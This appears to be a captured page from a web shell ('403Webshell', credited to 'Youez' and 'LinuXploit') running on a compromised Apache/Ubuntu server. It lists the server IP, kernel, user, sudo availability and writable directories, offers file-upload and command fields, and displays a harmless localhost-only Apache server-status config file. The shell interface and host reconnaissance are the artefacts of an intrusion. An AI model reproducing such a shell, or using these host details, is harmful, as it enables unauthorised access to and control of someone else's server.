403Webshell
Server IP : 35.80.110.71  /  Your IP : 216.73.216.221
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux ip-172-31-21-44 6.17.0-1019-aws #19~24.04.1-Ubuntu SMP Tue Jun 23 18:53:06 UTC 2026 x86_64
User : ubuntu ( 1000)
PHP Version : 8.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /etc/apache2/sites-enabled/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /etc/apache2/sites-enabled/000-server-status.conf
# Localhost-only Apache server-status (Tier 3 perf plan, 2026-06-25)
# Lets curl http://127.0.0.1:8088/server-status?auto bypass all the
# proxy vhosts on :80/:443 that otherwise capture /server-status.
<VirtualHost 127.0.0.1:8088>
    ServerName localhost-status
    DocumentRoot /var/www/html

    <Location /server-status>
        SetHandler server-status
        Require ip 127.0.0.1
    </Location>

    # Block everything else
    <Location />
        Require all denied
    </Location>
    <Location /server-status>
        Require ip 127.0.0.1
    </Location>

    ErrorLog ${APACHE_LOG_DIR}/status-error.log
    CustomLog ${APACHE_LOG_DIR}/status-access.log combined
</VirtualHost>

Youez - 2016 - github.com/yon3zu
LinuXploit